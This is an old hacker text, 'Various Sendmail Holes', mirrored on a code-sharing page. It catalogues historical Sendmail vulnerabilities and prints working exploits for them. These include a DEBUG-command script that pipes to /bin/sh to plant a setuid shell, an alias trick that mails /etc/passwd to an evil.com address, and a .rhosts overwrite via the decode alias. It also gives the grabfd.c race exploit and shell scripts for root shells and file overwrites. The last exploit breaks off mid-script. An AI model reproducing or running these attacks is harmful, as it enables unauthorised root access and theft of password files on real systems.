📄 sendmail2.txt
字号:
########### # ### ######### ## #
############ ### ##### ### ##### ### ##
##### #### ##### ####### ### ### #### ###
##### ##### ####### ######### ### # #### ####
#### ##### ####### ########### ### ### ####
######### ####### #### #### ### #######
########### ##### ##### ##### ### ## #######
############# ### ## ###### ######### ### #### #########
###### #### # #### ######## ##### ## ###### ### ###
###### #### ########## #### #### ######### ### #####
##### #### ########## ### ### ####### #### ######
############# ########## ## ## ##### #### ####
########### ######## ## ## ### ### ##
####### # # # #
########## ## ## ## ##
### ### ## ## ### ###
### # ### ### ##### #### Black Sun Research Facility
### ## ## ###### #### http://blacksun.box.sk
### ## ## ####### #### ASCII By : cyRu5
# ### ### ### #### #######
### #### #### #### ### #####
########### ########### ## ###
######### ####### # #
_______________________________________________________________________
Various Sendmail Holes: By Ankit Fadia <ankit@bol.net.in>
_______________________________________________________________________
Sendmail, known as the buggiest daemon on earth has a history of having
A large number of bugs. In this text, I have made a list of known
Sendmail holes. Of course, the list is not complete, but it's an
example of how many bugs Sendmail has had over the years.
I also recommend that you read the Sendmail security tutorial at
http://blacksun.box.sk in order to get a better view of what exactly is
Sendmail.
-----------------------------------------------------------------------
Hole Version of Sendmail
-----------------------------------------------------------------------
= WIZ = *oLD*
= DEBUG = *oLD*
= TURN = *oLD*
= OVERFLOW INPUT BUFFER = *oLD*
= DECODE ALIAS = *VrFy*
= qf SunOS = *SunOS-sendmailV5.1*
= -oR SunOS = *SunOS-sendmailV5.22*
= -oM = *8lgm6Dec1994-SMI-Sendmail(sm based on SunOS)*
= OVERWRITE FILES = *FiXED iN 5.59*
= -oQ = *DuNNo*
= |PROGRAM = *TeSTeD oN 5.55*
= .forward = *5.61*
= TAIL = *TeSTeD oN 5.65*
= -C = *oLD*
= 4.1 = *TeSTeD oN 4.1*
= -d########### = *8.X.X <8.6.7*
= -oE/filename bounce= *8.6.7*
= 8.6.9 ident = *8.6.9*
= 8.6.9 newlines = *8.6.9*
= 8.6.10 ident/newlines = *8.6.10*
= HP-UX = *HP-UX 9.x*
= 8.7.5 gecos = *8.X.X <8.8.0* *TeSTed oN 8.6.12*
= mime7to8() = *8.8.0*
= smtpd = *8.7-8.8.2*
=Local DOS= *Upto 8.9.3*
=Buggy Helo Command= *8.8.8*
=Gaint Sendmail Bug= *8.8.4*
-----------------------------------------------------------------------
WIZ = *oLD* =
The oldest and easiest hole in sendmail is the 'wiz' backdoor, now very
difficult to find. At the connect just type 'wiz' and then 'SHELL' ,and
you're in a root shell. [ it can be set by configuring sendmail.cf file ...
'OW' option immediately followed by the encrypted password ]
DEBUG = *oLD* =
This bug was used by the inet worm by Robert T. Morris Jr. Its exploiting
allows anyone to execute any program on a remote machine. It simply
consists in giving the 'debug' command, use a pipe to /bin/sh as recipient
and feed the data with the commands you want to be executed on the remote
machine.
[ If sendmail server answers with "200 Debug set" to the 'debug' command
there are good chances the bug is still present ]
Example :
#!/bin/sh
telnet << EOF
open fucked.host.edu 25
debug
mail from: </dev/null>
rcpt to: <\"|sed -e '1,/^$/'d | /bin/sh ; exit 0\">
data
cp /bin/sh /tmp/sushi # or alternatively:
chmod 4755 /tmp/sushi # echo "+ +" >> /.rhosts
.
EOF
TURN = *oLD* =
TURN command allows mail to be stolen ... [ Don't bother, old stuff! ]
OVERFLOW INPUT BUFFER = *oLD* =
Cause the sendmail deamon to lock up ... [ old stuff! Just for collection
;) ]
DECODE ALIAS = *VrFy* =
If '/etc/aliases' contains "|/usr/bin/uudecode" anyone can send mail to
decode, write to any file onwed by daemon, if they can connect to sendmail
daemon, can write to any file owned by any user.
To test the existence of decode alias from a sendmail connection do:
% telnet target.com
Trying 127.127.127.127
Connected to target.com
Escape character is '^]'.
220 target.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit
1SecExploit:
% echo "myhost.com" | uuencode /usr/bin/.rhosts | mail decode@target.com
MoreThan1SecExploit:
% cat > outfile # Let's make our .rhosts file
+ +
^C
% uuencode outfile /usr/bin/.rhosts
begin 644 /bin/.rhosts
$*R'K"O\
% telnet fuqdhost.com 25
220 fuqdhost.com SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 ... Sender Okay
RCPT TO: decode
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R'K"O\ # which is just "+ +" uuencoded
end
.
250 Mail accepted
quit
221 fuqdhost.com closing connection
Connection closed by foreign host.
% rlogin fuqdhost.com -l bin
$
If no home directories are known or writable, an interesting variation of
this is to create a bogus /etc/aliases.pag file that contains an alias with
a command you wish to execute on your target. This may work since on many
systems the aliases.pag and aliases.dir files, which control the system's
mail aliases, are writable to the world.
evil % cat decode
bin: "| cat /etc/passwd | mail zen@evil.com"
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victim.com
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
qf SunOS = SunOS-sendmailV5.1 =
The method used by sendmail version 5 to open a control file
[/usr/spool/mqueue/qf########] is unsecure. A race condition exists whereby
another process may obtain a control-file file descriptor, opened for write
access. Sendmail v5, during execution, sets umask(0), which is an insecure
mask. In order not to leave open control files with mode 666, sendmail v5
uses chmod(2) to set a secure file mode. However this is a race condition,
as we can obtain an open file descriptor for write by opening the control
file before the call to chmod(2).
IMPACT: Local users can write their own control files, and run programs
as any user, bar root.
EXPLOIT:
grabfd.c:
/*
* grabfd.c
* usage: grabfd username command-file
*
* username: user to execute 'command-file' as.
* command-file: file containing 10 lines of shell commands to execute.
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/fcntl.h>
#include <sys/param.h>
#ifndef SENDMAIL
#define SENDMAIL "/usr/lib/sendmail"
#endif
#ifndef SPOOL_DIR
#define SPOOL_DIR "/usr/spool/mqueue"
#endif
char myqfile[] = "D%s\nC%s\nR|/usr/ucb/tail|/bin/sh\n";
main(argc,argv)
int argc;
char **argv;
{
int pid, fd;
char tbuf[MAXPATHLEN], sysbuf[BUFSIZ];
if (argc != 3) {
(void)fprintf(stderr, "%s: user file\n",
argv[0]);
exit(1);
}
if (getpwnam(argv[1]) == NULL)
(void)fprintf(stderr, "%s: user %s unknown (error
ignored)\n",
argv[0],
argv[1]);
if (access(argv[2], F_OK) == -1) {
(void)fprintf(stderr, "%s: %s does not exist.\n",
argv[0],
argv[2]);
exit(1);
}
if (access(SPOOL_DIR, X_OK) == -1) {
(void)fprintf(stderr, "%s: cannot access %s.\n",
argv[0],
SPOOL_DIR);
exit(1);
}
if (pid=fork()) {
if (pid == -1) {
(void)perror("fork");
exit(1);
}
(void)sprintf(tbuf, "%s/tfAA%05d", SPOOL_DIR, pid);
(void)sprintf(sysbuf, myqfile, argv[2], argv[1]);
for (;;)
if ((fd=(open(tbuf, O_WRONLY, 0))) != -1) {
(void)printf("%s: grabbed queue fd.\n",
argv[0]);
(void)wait();
(void)ftruncate(fd, 0);
(void)write(fd, sysbuf, strlen(sysbuf));
(void)close(fd);
if(execl(SENDMAIL,
"sendmail", "-q", (char *)0) == -1) {
(void)perror("execl");
exit(1);
};
}
} else {
(void)close(0);
if (open("/etc/motd", O_RDONLY, 0) == -1) {
(void)perror("open");
exit(1);
};
if (execl(SENDMAIL,
"sendmail",
#ifdef sun
"-os",
#endif
"-odq", getlogin(), (char *)0) == -1) {
(void)perror("execl");
exit(1);
};
}
exit(1);
}
::::::::::::::::::::::::::::::::: END OF HOLE ::::::::::::::::::::::::::::
-oR SunOS = SunOS-4.1.X-sendmail V5.22 =
From 8lgm:
DESCRIPTION: The -oR option uses popen() to return undeliverable mail.
IMPACT: Local users can obtain root access.
-------------------------- ropt.sh ---------------------------------------
#!/bin/sh
#
# Syntax: roption host
#
# host is any system running sendmail (except localhost).
#
# This exploits a flaw in SunOS sendmail(8), and attempts
# create a suid root shell
#
# Written 1995 by [8LGM]
# Please do not use this script without permission.
#
PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
# Check args
if [ $# -ne 1 ]; then
echo "Syntax: $PROG host"
exit 1
fi
# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
echo "Sorry, this only works on SunOS"
exit 1
fi
PROG="`basename $0`"
EXECME=/tmp/HotterThanMojaveInMyHeart
# Create EXECME.c
cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
chown("/tmp/InfamousAngel", 0, 0);
chmod("/tmp/InfamousAngel", 04755);
}
EOF
cc -o $EXECME $EXECME.c
# Check we have EXECME
if [ ! -x $EXECME ]; then
echo "$PROG: couldnt compile $EXECME.c - check it out"
exit 1
fi
/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail
/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular
Hows it goin
EOF
exec /tmp/InfamousAngel
................................ Cut HeRe ...................................
-oM = 8lgm6Dec1994-SMI-Sendmail(based on SunOS sm) =
Sun sendmail allows -oM to set any macro, and still retains root privilege.
( The list of 'trusted' macros should be limited. )
At time of writing (Dec 1994) affected sendmail were: " SunOS 4.x Sendmail
- all versions including latest 4/5/94 Sendmail Jumbo Patch 100377-15 "
After further investigation, it has been discovered that SVR4 based ports
include sendmail(8) based on SMI code.
EXPLOIT:
1. Create the file sunsendmailcp
8>------------------------- cut here ---------------------------
#!/bin/sh
#
# sunsendmailcp from to
if [ $# -ne 2 ]; then
echo usage: `basename $0` from to
exit 1
fi
rm -f /usr/tmp/dead.letter
if [ -f /usr/tmp/dead.letter ]; then
echo sorry, cant continue - /usr/tmp/dead.letter exists
fi
if [ ! -r $1 ]; then
echo $1 doesnt exist or is unreadable
exit 1
fi
ln -s $2 /usr/tmp/dead.letter
/usr/lib/sendmail -L0 '-oM#anything' $USER < $1
rm /usr/tmp/dead.letter
exit 0
8>------------------------- cut here ---------------------------
2. Execute the command % ./sunsendmailcp sourcefile targetfile and target
file will either be appended to or created.
OVERWRITE FILES = FiXED iN 5.59 =
Remote users are able to write to any non-root owned files in the system.
This bug was definitely fixed in version 5.59 from Berkeley; despite the
messages below, for versions of sendmail previous to 5.59, the "evil.com"
gets appended, despite the error messages, along with all of the typical
mail headers, to the file specified:
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -